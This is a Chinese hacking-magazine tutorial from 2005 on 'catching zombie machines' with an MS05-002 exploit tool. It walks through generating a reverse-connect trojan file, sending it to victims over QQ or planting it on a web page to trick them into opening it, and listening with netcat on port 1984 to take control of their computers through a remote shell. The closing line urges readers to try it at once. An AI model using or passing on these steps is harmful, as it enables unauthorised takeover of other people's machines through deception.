黑客如何利用Ms05002溢出找“肉鸡”

10/24/2005来源:黑客攻防人气:10850

  溢出攻击永远是安全界中,不可忽视的角色。而如今也正是肉鸡短缺的年代,能掌握一门最新的Ms05002溢出,必定会让你有“惊人”的收获。至于熟练的溢出如何炼成?具体方法请见下文所示!

  实施方法:通过Ms05002攻击工具,溢出反弹ip、反弹端口,会生成含有木马性质的文件。然后将这个产生的文件,以QQ传输的形式发给受害者观看,或者将其上传到自己的主页空间,引诱其他人访问。最后执行NC瑞士军刀,监听本机端口,收取已经运行产生文件的主机。

  步骤1.首先从网上下载Ms05002溢出工具,释放到比较理想的硬盘驱动器中,然后在CMD命令行下,输入软件名称启动该程序,会出现一些英文形式的帮助信息(如图1)。

  小提示:Ms05002溢出工具,是一款需要在命令行下支持运行的程序,它可以通过溢出反弹的IP地址,生成木马服务端。这点与其他溢出程序是完全不同,而且效率相比之下,也有明显的提高,真不愧是即所有溢出程序的升级版本。

  步骤2.继续在其下的命令行处,输入命令Ms05002 要生成的木马文件名 本地机器IP地址 溢出端口(如图2),然后敲击“回车键”执行。屏幕会不停的向上滚动,这时还会出现带有两句“OK”的字母提示,说明木马文件已经生成完毕了。



图 2

  步骤3.通常溢出过后,都需要监听工具来抓捕肉鸡。这里也不例外,跳转到事先准备的NC工具所在目录,然后在其命令行处输入NC –VV –L –P 1984的监听命令,并敲击“回车”键,开始监听本地1984端口的信息出入。

  小提示:NC监听软件-VV参数代表,得到更详细的输入监听内容。-L代表连接端口关闭后,仍然继续监听。-P进行监听本地端口,后跟数字就是所要监听的端口号。

  步骤4.将溢出生成的木马,以QQ形式发给网友运行,或者上传到自己的个人空间中,骗取受害者浏览运行。如果用户不幸查看所发去的木马,正在本机监听的NC等待状况,就会改为可操作命令行(如图3)。而此时的命令操作平台,也正是远方主机的SHELL平台(有关SHELL的解释,已经在前几篇文章中叙述过,这里就不做过多讲解了),现在你就可以在其主机上,为所欲为的以命令形式操控机器。



图 3

  结束语:最快捷和最灵验的“抓鸡”方法,已经摆在您面前了。还在犹豫什么?赶快前去一试此妙法吧!